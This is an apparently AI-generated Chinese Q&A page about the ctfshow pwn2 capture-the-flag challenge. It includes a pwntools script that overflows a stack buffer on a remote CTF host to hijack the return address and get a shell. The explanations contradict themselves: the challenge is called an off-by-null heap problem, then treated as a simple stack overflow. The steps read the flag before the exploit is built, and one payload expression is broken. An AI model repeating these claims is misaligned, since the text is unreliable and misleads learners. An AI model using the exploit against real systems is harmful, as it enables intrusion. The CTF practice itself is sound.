ctfshow的pwn2
时间: 2023-11-09 12:06:19 浏览: 143
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下:
1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。
2. 使用cat命令打开flag文件,成功拿到flag。
3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。
4. 设置bk变量的值为0x804850f。
5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。
6. 使用sendline函数发送payload。
7. 使用interactive函数与远程主机进行交互。
相关问题
ctfshow pwn
你想了解关于 CTFShow Pwn 的信息吗?CTFShow 是一个国内知名的CTF比赛平台,Pwn 则是其中的一个攻防领域,主要涉及利用漏洞进行系统攻击和控制的技术。在 CTFShow Pwn 中,参赛选手需要通过分析二进制程序的漏洞,利用它们来获取系统控制权,并完成指定的任务。这个领域需要对二进制程序分析、漏洞挖掘、堆栈溢出、ROP链构造等技术有一定的了解和实践经验。如果你对具体的题目或技术有更具体的问题,我可以帮你进一步解答。
ctfshow PWN
根据引用和引用中的内容,ctfshow函数是一个简单的栈溢出漏洞的示例程序。在32位程序中,返回地址一般是ebp + 4。而在64位程序中,返回地址一般是rbp + 8。通过利用栈溢出漏洞,我们可以修改返回地址,从而控制程序的执行流程。在ctfshow函数中,我们可以使用payload来覆盖返回地址,以实现获取shell的目的。具体的exploit代码如下:
```
from pwn import *
#p = process("./pwn10")
p = remote("111.231.70.44",28010)
p.recv()
payload = b"A"*(0x94) + p32(0x0804850F)
p.send(payload)
p.interactive()
```
这段代码会将payload发送给目标程序,其中0x94是用来填充溢出的字节数,再加上要跳转到的地址0x0804850F。通过这个exploit,我们可以成功获取shell。
希望这个回答能够解决你的问题。如果你还有其他问题,请随时提问。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *2* *3* [ctfshow-pwn新手系列](https://blog.csdn.net/gd_9988/article/details/106744216)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"]
[ .reference_list ]
阅读全文
相关推荐














